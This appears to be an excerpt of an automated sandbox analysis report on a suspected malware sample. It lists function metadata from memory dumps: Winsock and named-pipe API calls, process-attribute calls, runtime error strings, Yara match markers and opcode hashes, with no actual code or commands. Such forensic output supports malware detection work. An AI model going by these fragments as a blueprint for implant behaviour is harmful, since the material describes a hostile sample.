                    • API ID: clock
                    • String ID:
                    • API String ID: 3195780754-0
                    APIs
                    • accept.WS2_32 ref: 0067EF71
                    • send.WS2_32 ref: 0067EFAF
                    • send.WS2_32 ref: 0067EFC3
                    • closesocket.WS2_32 ref: 0067EFD4
                      • Part of subcall function 0067F098: closesocket.WS2_32 ref: 0067F0A4
                      • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0AE
                      • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0B7
                      • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0C0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$closesocketsend$accept
                    • String ID:
                    • API String ID: 47150829-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$NamedPeekPipeSleep
                    • String ID:
                    • API String ID: 1593283408-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$NamedPeekPipeSleep
                    • String ID:
                    • API String ID: 1593283408-0
                    APIs
                    • InitializeProcThreadAttributeList.KERNEL32 ref: 0067770E
                    • GetProcessHeap.KERNEL32 ref: 00677714
                    • HeapAlloc.KERNEL32 ref: 00677724
                    • InitializeProcThreadAttributeList.KERNEL32 ref: 0067773F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                    • String ID:
                    • API String ID: 1212816094-0
                    APIs
                    • closesocket.WS2_32 ref: 0067F0A4
                    • free.LIBCMT ref: 0067F0AE
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • free.LIBCMT ref: 0067F0B7
                    • free.LIBCMT ref: 0067F0C0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                    • String ID:
                    • API String ID: 1525665891-0
                    Strings
                    • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                    • Unknown pseudo relocation bit size %d., xrefs: 00402294
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID:
                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                    • API String ID: 0-395989641
                    APIs
                    Strings
                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                    • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: QueryVirtual
                    • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                    • API String ID: 1804819252-157664173
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: __set_app_type
                    • String ID: 06E$P0E
                    • API String ID: 1108511539-3978550416
                    • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                    • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                    • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                    • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                    APIs
                    • _errno.LIBCMT ref: 0067F8B1
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _invalid_parameter_noinfo.LIBCMT ref: 0067F8BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID: B
                    • API String ID: 1812809483-1255198513
                    • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                    • Instruction ID: 696ec82873bee636f2cfc17656ce8eca3729c8e3e8ee0a98847dae6747d9afc8
                    • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                    • Instruction Fuzzy Hash: 9001ADB2620B4086DB109F12E440799B662FB98FE4FA88325AF5C07BA5CF38C141CB04
                    APIs
                    • _errno.LIBCMT ref: 001BECB1
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001BECBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID: B
                    • API String ID: 1812809483-1255198513
                    • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                    • Instruction ID: 4ab64148a078f30f592bfda4bf66d86ddaf9101564b499946e096a0180613029
                    • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                    • Instruction Fuzzy Hash: 31018472614B5486EB109F12D4447D9B6A1F7A9FE4F584325EF5817B95CF38C144CB00
                    APIs
                    Strings
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    • Unknown error, xrefs: 00401D2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-3474627141
                    • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                    • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                    • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                    • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                    APIs
                    Strings
                    • Overflow range error (OVERFLOW), xrefs: 00401D00
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4064033741
                    • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                    • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                    • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                    • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                    APIs
                    Strings
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2187435201
                    • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                    • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                    • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                    • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                    APIs
                    Strings
                    • Total loss of significance (TLOSS), xrefs: 00401D20
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4273532761
                    • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                    • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                    • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                    • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                    APIs
                    Strings
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    • Argument domain error (DOMAIN), xrefs: 00401CE0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2713391170
                    • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                    • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                    • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                    • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                    APIs
                    Strings
                    • Partial loss of significance (PLOSS), xrefs: 00401CF0
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4283191376
                    • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                    • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                    • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                    • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                    APIs
                    Strings
                    • Argument singularity (SIGN), xrefs: 00401C78
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2468659920
                    • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                    • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                    • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                    • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                    APIs
                    • calloc.LIBCMT ref: 00661D6A
                      • Part of subcall function 0068EE08: _calloc_impl.LIBCMT ref: 0068EE18
                      • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE2B
                      • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE35
                    • free.LIBCMT ref: 00661EF3
                    • free.LIBCMT ref: 00661EFD
                    • free.LIBCMT ref: 00661F0F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_calloc_implcalloc
                    • String ID:
                    • API String ID: 4000150058-0
                    • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                    • Instruction ID: 1a8b3b2cf1c52a6259925237e4e9cbc3425f2cca5b61c0d3a4cc04866f41f30a
                    • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                    • Instruction Fuzzy Hash: 18C13B32608B848AD760CF65E88039E77B5F789B88F14412AEF8D87B18EF39C555CB00
                    APIs
                    • calloc.LIBCMT ref: 001A116A
                      • Part of subcall function 001CE208: _calloc_impl.LIBCMT ref: 001CE218
                      • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE22B
                      • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE235
                    • free.LIBCMT ref: 001A12F3
                    • free.LIBCMT ref: 001A12FD
                    • free.LIBCMT ref: 001A130F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_calloc_implcalloc
                    • String ID:
                    • API String ID: 4000150058-0
                    • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                    • Instruction ID: ef13a074418b6d296590a38f5d20f9b5ca4bc9d75961e5e567413d64bbd8a4b0
                    • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                    • Instruction Fuzzy Hash: 09C10C36608B859AD764CF65E88479EB7F4F789B88F10412AEB8D87B18DF38C555CB00
                    APIs
                    • malloc.LIBCMT ref: 0067AD78
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • free.LIBCMT ref: 0067AEBF
                    • free.LIBCMT ref: 0067AF23
                    • free.LIBCMT ref: 0067AF2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$AllocHeap_callnewhmalloc
                    • String ID:
                    • API String ID: 3531731211-0
                    • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                    • Instruction ID: 4dfa9effe5ef590a14f708f6425d43e3cd84eb666ee08e0ad8d86dc367fc0050
                    • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                    • Instruction Fuzzy Hash: D751007630064582DA98ABA2D4503AD7393FBC4B80F54893AEE0E27B56EF7DC515C706
                    APIs
                    • malloc.LIBCMT ref: 001BA178
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • free.LIBCMT ref: 001BA2BF
                    • free.LIBCMT ref: 001BA323
                    • free.LIBCMT ref: 001BA32F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc
                    • String ID:
                    • API String ID: 2761444284-0
                    • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                    • Instruction ID: 186e246a70f57c853be465db647510dd0cca896556ffc241b6b8c2dc239f5aab
                    • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                    • Instruction Fuzzy Hash: 5D51003130074582DE28AF22E8507ED63E2FBA5BC0F984429EE4A17B65EF79C502C701
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc
                    • String ID:
                    • API String ID: 2803490479-0
                    • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                    • Instruction ID: 530ed90c7799d936ae7596f3242aec9e382011cf7b4911ccbaf5d58aa51a8d27
                    • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                    • Instruction Fuzzy Hash: B541CA3230478087CB58DF66E411BAE73A2F784F88F548529EE6A87B05EF38D946C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc
                    • String ID:
                    • API String ID: 2803490479-0
                    • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                    • Instruction ID: 77d767e9024fda2d898012a813aef0076d0c7132e078364397b5c0eabe0b130c
                    • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                    • Instruction Fuzzy Hash: 2C41BE7670078087CB18DF66E4107AE77A1F796B84F458625FE2A47B08EF38DA06C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CurrentProcessfreemalloc
                    • String ID:
                    • API String ID: 1397824077-0
                    • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                    • Instruction ID: e3c96e085606936993393d51645e5bd6fe23844c8dd89ffb8ca1b770db688147
                    • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                    • Instruction Fuzzy Hash: 52418372314A8186DB64DB26E4417AF63A3FB857D8F00942AEF8E4BB49EF3DC5418704